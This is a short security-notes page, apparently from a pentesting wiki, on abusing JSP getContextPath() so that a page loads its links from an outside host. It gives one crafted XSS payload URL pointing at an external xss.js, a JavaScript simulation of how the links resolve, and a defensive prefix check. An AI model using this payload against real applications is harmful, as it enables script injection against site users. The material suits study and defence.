2020-07-15 15:43:14 +00:00

# JSP

## **getContextPath** abuse

Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).

```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```

Accessing that URL changes all the links on the page so that they request their resources from _**rakeshmane.com**_:

![](<../../.gitbook/assets/image (260).png>)
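
The link rewriting shown above follows from how a browser resolves a prefix that starts with `//`. The block below is an added example, not code from the original page or the linked write-up. It assumes the JSP prefixes its links with the value of `request.getContextPath()`, that this value is the raw request prefix preceding `/test.jsp`, and that the page references the hypothetical resources `/js/app.js` and `/css/site.css`.

```javascript
// URL from the page above.
const PAGE_URL =
  'http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp';

// Assumption: getContextPath() echoes the raw request prefix that precedes
// "/test.jsp", and the JSP writes links as that prefix + resource path.
function rawPrefix(url) {
  const afterOrigin = url.slice(new URL(url).origin.length);
  return afterOrigin.slice(0, afterOrigin.lastIndexOf('/'));
}

// Resolve every emitted link the way a browser would and return the hosts
// of those that leave the document's host. A prefix starting with "//" is
// a scheme-relative URL, so its first segment is read as a host name.
function offOriginLinks(prefix, resources, documentUrl) {
  const docHost = new URL(documentUrl).host;
  return resources
    .map((r) => new URL(prefix + r, documentUrl))
    .filter((u) => u.host !== docHost)
    .map((u) => u.host);
}

// Defensive check for a value about to be used as a link prefix: either
// the root context ("") or "/segment" repeated, with no empty or ".."
// segments. The allowed character set also excludes "#" and ";" as used
// in the URL above.
function isPlainContextPath(prefix) {
  if (prefix === '') return true;
  if (!/^(\/[A-Za-z0-9._~-]+)+$/.test(prefix)) return false;
  return !prefix.split('/').includes('..');
}

// Hypothetical resources referenced by the page template.
const RESOURCES = ['/js/app.js', '/css/site.css'];

const crafted = rawPrefix(PAGE_URL);
console.log(crafted, isPlainContextPath(crafted));
console.log(offOriginLinks(crafted, RESOURCES, PAGE_URL));
console.log(offOriginLinks('/contextPathExample', RESOURCES, PAGE_URL));
```

On the server side, `ServletContext.getContextPath()` returns the context path the application is deployed under and does not depend on the request URI, which makes it a safer source for link prefixes.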